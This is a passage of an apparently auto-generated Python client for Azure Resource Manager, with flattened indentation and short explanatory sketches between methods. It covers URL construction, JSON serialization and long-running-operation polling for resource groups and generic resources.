body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 202:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = LongRunningOperationResponse()
result.status_code = status_code
result.operation_status_link = response.headers.get('location')
result.retry_after = int(response.headers.get('retry-after', '0'))
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 409:
result.status = OperationStatus.Failed
if status_code == 200:
result.status = OperationStatus.Succeeded
return result
def check_existence(self, resource_group_name):
"""
Checks whether resource group exists.
Args:
resource_group_name (string): The name of the resource group to check.
The name is case insensitive.
Returns:
ResourceGroupExistsResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'HEAD'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 204 and status_code != 404:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = ResourceGroupExistsResult()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 204:
result.exists = True
return result
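# check_existence() issues a HEAD request and maps HTTP 204 to "exists" and
# 404 to "does not exist"; any other code is an error. That mapping in
# isolation (a sketch, not part of this client):

```python
def exists_from_status(status_code):
    """Interpret the HEAD status code from a resource-group existence check."""
    if status_code not in (204, 404):
        raise ValueError('unexpected status code: %d' % status_code)
    return status_code == 204
```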
def create_or_update(self, resource_group_name, parameters):
"""
Create a resource group.
Args:
resource_group_name (string): The name of the resource group to be
created or updated.
parameters (ResourceGroup): Parameters supplied to the create or
update resource group service operation.
Returns:
ResourceGroupCreateOrUpdateResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.location is None:
raise ValueError('parameters.location cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
resource_group_value = {}
request_doc = resource_group_value
resource_group_value['location'] = parameters.location
if parameters.properties is not None:
resource_group_value['properties'] = json.loads(parameters.properties)
if parameters.tags is not None:
tags_dictionary = {}
for tags_key in parameters.tags:
tags_value = parameters.tags[tags_key]
tags_dictionary[tags_key] = tags_value
resource_group_value['tags'] = tags_dictionary
if parameters.provisioning_state is not None:
resource_group_value['provisioningState'] = parameters.provisioning_state
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = ResourceGroupCreateOrUpdateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_group_instance = ResourceGroupExtended(tags={})
result.resource_group = resource_group_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_instance.provisioning_state = provisioning_state_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_instance.location = location_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_instance.properties = properties_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for tags_key2 in tags_sequence_element:
tags_value2 = tags_sequence_element[tags_key2]
resource_group_instance.tags[tags_key2] = tags_value2
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_instance.provisioning_state = provisioning_state_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def delete(self, resource_group_name):
"""
Delete resource group and all of its resources.
Args:
resource_group_name (string): The name of the resource group to be
deleted. The name is case insensitive.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
client2 = self.client
response = client2.resource_groups.begin_deleting(resource_group_name)
result = client2.get_long_running_operation_status(response.operation_status_link)
delay_in_seconds = response.retry_after
if delay_in_seconds == 0:
delay_in_seconds = 30
if client2.long_running_operation_initial_timeout >= 0:
delay_in_seconds = client2.long_running_operation_initial_timeout
while result.status == OperationStatus.in_progress:
time.sleep(delay_in_seconds)
result = client2.get_long_running_operation_status(response.operation_status_link)
delay_in_seconds = result.retry_after
if delay_in_seconds == 0:
delay_in_seconds = 15
if client2.long_running_operation_retry_timeout >= 0:
delay_in_seconds = client2.long_running_operation_retry_timeout
return result
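# delete() above polls get_long_running_operation_status until the status
# leaves the in-progress state, preferring client-configured timeouts over
# the service's retry hint. The loop in isolation, with an injectable
# poll/sleep for testing (a sketch, not the client's implementation):

```python
def poll_until_done(poll, in_progress='InProgress', default_delay=15,
                    sleep=lambda seconds: None):
    """Poll a long-running operation until its status leaves in_progress.

    poll() returns a (status, retry_after_seconds) tuple.
    """
    status, retry_after = poll()
    while status == in_progress:
        # Honor the service's retry hint, falling back to a default delay.
        sleep(retry_after or default_delay)
        status, retry_after = poll()
    return status
```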
def get(self, resource_group_name):
"""
Get a resource group.
Args:
resource_group_name (string): The name of the resource group to get.
The name is case insensitive.
Returns:
ResourceGroupGetResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_group_instance = ResourceGroupExtended(tags={})
result.resource_group = resource_group_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_instance.provisioning_state = provisioning_state_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_instance.location = location_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_instance.properties = properties_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for tags_key in tags_sequence_element:
tags_value = tags_sequence_element[tags_key]
resource_group_instance.tags[tags_key] = tags_value
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_instance.provisioning_state = provisioning_state_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, parameters):
"""
Gets a collection of resource groups.
Args:
parameters (ResourceGroupListParameters): Query parameters. If None is
passed, all resource groups are returned.
Returns:
ResourceGroupListResult: List of resource groups.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups'
query_parameters = []
odata_filter = []
if parameters is not None and parameters.tag_name is not None:
odata_filter.append('tagname eq \'' + quote(parameters.tag_name) + '\'')
if parameters is not None and parameters.tag_value is not None:
odata_filter.append('tagvalue eq \'' + quote(parameters.tag_value) + '\'')
if len(odata_filter) > 0:
query_parameters.append('$filter=' + ' and '.join(odata_filter))
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupListResult(resource_groups=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_group_json_format_instance = ResourceGroupExtended(tags={})
result.resource_groups.append(resource_group_json_format_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_json_format_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_json_format_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_json_format_instance.provisioning_state = provisioning_state_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_json_format_instance.location = location_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_json_format_instance.properties = properties_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for tags_key in tags_sequence_element:
tags_value = tags_sequence_element[tags_key]
resource_group_json_format_instance.tags[tags_key] = tags_value
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_json_format_instance.provisioning_state = provisioning_state_instance2
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
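# list() assembles an OData $filter from the optional tag name/value
# parameters and appends $top and api-version. The query assembly in
# isolation (a sketch; parameter names assumed from the code above):

```python
from urllib.parse import quote

def build_list_query(tag_name=None, tag_value=None, top=None,
                     api_version='2014-04-01-preview'):
    """Build the query string used by the resource-group List operation."""
    query_parameters = []
    odata_filter = []
    if tag_name is not None:
        odata_filter.append("tagname eq '" + quote(tag_name) + "'")
    if tag_value is not None:
        odata_filter.append("tagvalue eq '" + quote(tag_value) + "'")
    if odata_filter:
        query_parameters.append('$filter=' + ' and '.join(odata_filter))
    if top is not None:
        query_parameters.append('$top=' + quote(str(top)))
    query_parameters.append('api-version=' + api_version)
    return '?' + '&'.join(query_parameters)
```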
def list_next(self, next_link):
"""
Gets the next page of resource groups.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
ResourceGroupListResult: List of resource groups.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupListResult(resource_groups=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_group_json_format_instance = ResourceGroupExtended(tags={})
result.resource_groups.append(resource_group_json_format_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_json_format_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_json_format_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_json_format_instance.provisioning_state = provisioning_state_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_json_format_instance.location = location_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_json_format_instance.properties = properties_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for tags_key in tags_sequence_element:
tags_value = tags_sequence_element[tags_key]
resource_group_json_format_instance.tags[tags_key] = tags_value
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_json_format_instance.provisioning_state = provisioning_state_instance2
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
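# list() and list_next() page through results by following the
# '@odata.nextLink' value until it is absent. A generator sketch with a
# stubbed fetch(url) -> parsed-JSON dict (hypothetical helper):

```python
def iterate_pages(fetch, first_url):
    """Yield every item across pages linked via '@odata.nextLink'."""
    url = first_url
    while url is not None:
        page = fetch(url)
        for item in page.get('value') or []:
            yield item
        url = page.get('@odata.nextLink')
```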
def patch(self, resource_group_name, parameters):
"""
Resource groups can be updated through a simple PATCH operation to a
group address. The format of the request is the same as that for
creating a resource group; if a field is unspecified, the current
value is carried over.
Args:
resource_group_name (string): The name of the resource group to be
created or updated. The name is case insensitive.
parameters (ResourceGroup): Parameters supplied to the update state
resource group service operation.
Returns:
ResourceGroupPatchResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.location is None:
raise ValueError('parameters.location cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PATCH'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
resource_group_value = {}
request_doc = resource_group_value
resource_group_value['location'] = parameters.location
if parameters.properties is not None:
resource_group_value['properties'] = json.loads(parameters.properties)
if parameters.tags is not None:
tags_dictionary = {}
for tags_key in parameters.tags:
tags_value = parameters.tags[tags_key]
tags_dictionary[tags_key] = tags_value
resource_group_value['tags'] = tags_dictionary
if parameters.provisioning_state is not None:
resource_group_value['provisioningState'] = parameters.provisioning_state
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceGroupPatchResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_group_instance = ResourceGroupExtended(tags={})
result.resource_group = resource_group_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_group_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
resource_group_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_group_instance.provisioning_state = provisioning_state_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_group_instance.location = location_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_group_instance.properties = properties_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for tags_key2, tags_value2 in tags_sequence_element.items():
resource_group_instance.tags[tags_key2] = tags_value2
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_group_instance.provisioning_state = provisioning_state_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class ResourceOperations(object):
"""
Operations for managing resources.
Note: An instance of this class is automatically created for an
instance of the ResourceManagementClient.
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the underlying ResourceManagementClient.
"""
return self._client
def check_existence(self, resource_group_name, identity):
"""
Checks whether a resource exists.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
Returns:
ResourceExistsResult: Whether the resource exists.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity.resource_name cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity.resource_provider_api_version cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity.resource_provider_namespace cannot be None.')
if identity.resource_type is None:
raise ValueError('identity.resource_type cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 404:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = ResourceExistsResult()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 200:
result.exists = True
else:
result.exists = False
return result
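The base-URL/path joining done above (and repeated in every operation here) can be sketched as one standalone helper; `join_url` is an illustrative name, not part of the SDK:

```python
def join_url(base_url, path):
    """Join a base URL and a path, trimming the duplicate '/' between
    them and percent-encoding spaces, mirroring the inline logic above."""
    if base_url.endswith('/'):
        base_url = base_url[:-1]
    if path.startswith('/'):
        path = path[1:]
    return (base_url + '/' + path).replace(' ', '%20')
```

This is only the literal joining step; real request URLs are still built by quoting each path segment first, as the operations above do.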
def create_or_update(self, resource_group_name, identity, parameters):
"""
Creates or updates a resource.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
parameters (GenericResource): Create or update resource parameters.
Returns:
ResourceCreateOrUpdateResult: Resource information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity.resource_name cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity.resource_provider_api_version cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity.resource_provider_namespace cannot be None.')
if identity.resource_type is None:
raise ValueError('identity.resource_type cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.location is None:
raise ValueError('parameters.location cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
generic_resource_value = {}
request_doc = generic_resource_value
if parameters.properties is not None:
generic_resource_value['properties'] = json.loads(parameters.properties)
if parameters.provisioning_state is not None:
generic_resource_value['provisioningState'] = parameters.provisioning_state
if parameters.plan is not None:
plan_value = {}
generic_resource_value['plan'] = plan_value
if parameters.plan.name is not None:
plan_value['name'] = parameters.plan.name
if parameters.plan.publisher is not None:
plan_value['publisher'] = parameters.plan.publisher
if parameters.plan.product is not None:
plan_value['product'] = parameters.plan.product
if parameters.plan.promotion_code is not None:
plan_value['promotionCode'] = parameters.plan.promotion_code
generic_resource_value['location'] = parameters.location
if parameters.tags is not None:
generic_resource_value['tags'] = dict(parameters.tags)
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = str(len(request_content))
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = ResourceCreateOrUpdateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_instance = GenericResourceExtended(tags={})
result.resource = resource_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_instance.provisioning_state = provisioning_state_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_instance.properties = properties_instance
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_instance.provisioning_state = provisioning_state_instance2
plan_value2 = response_doc.get('plan', None)
if plan_value2 is not None:
plan_instance = Plan()
resource_instance.plan = plan_instance
name_value = plan_value2.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value2.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value2.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value2.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_instance.id = id_instance
name_value2 = response_doc.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_instance.name = name_instance2
type_value = response_doc.get('type', None)
if type_value is not None:
type_instance = type_value
resource_instance.type = type_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_instance.location = location_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for tags_key2, tags_value2 in tags_sequence_element.items():
resource_instance.tags[tags_key2] = tags_value2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
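A hedged sketch of the request-body serialization performed by `create_or_update` above: optional fields are emitted only when set, the `properties` JSON string is parsed back into a document, and tags are copied into a plain dict. `build_generic_resource_doc` and its keyword parameters are illustrative stand-ins for the `GenericResource` fields:

```python
import json

def build_generic_resource_doc(location, properties_json=None, tags=None):
    """Assemble the PUT body for a generic resource: required location,
    optional parsed properties, and an optional copy of the tags mapping."""
    doc = {}
    if properties_json is not None:
        # The SDK stores properties as a JSON string; the wire format is a document.
        doc['properties'] = json.loads(properties_json)
    doc['location'] = location
    if tags is not None:
        doc['tags'] = dict(tags)
    return json.dumps(doc)
```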
def delete(self, resource_group_name, identity):
"""
Deletes a resource and all of its nested resources.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity.resource_name cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity.resource_provider_api_version cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity.resource_provider_namespace cannot be None.')
if identity.resource_type is None:
raise ValueError('identity.resource_type cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'DELETE'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 202 and status_code != 204:
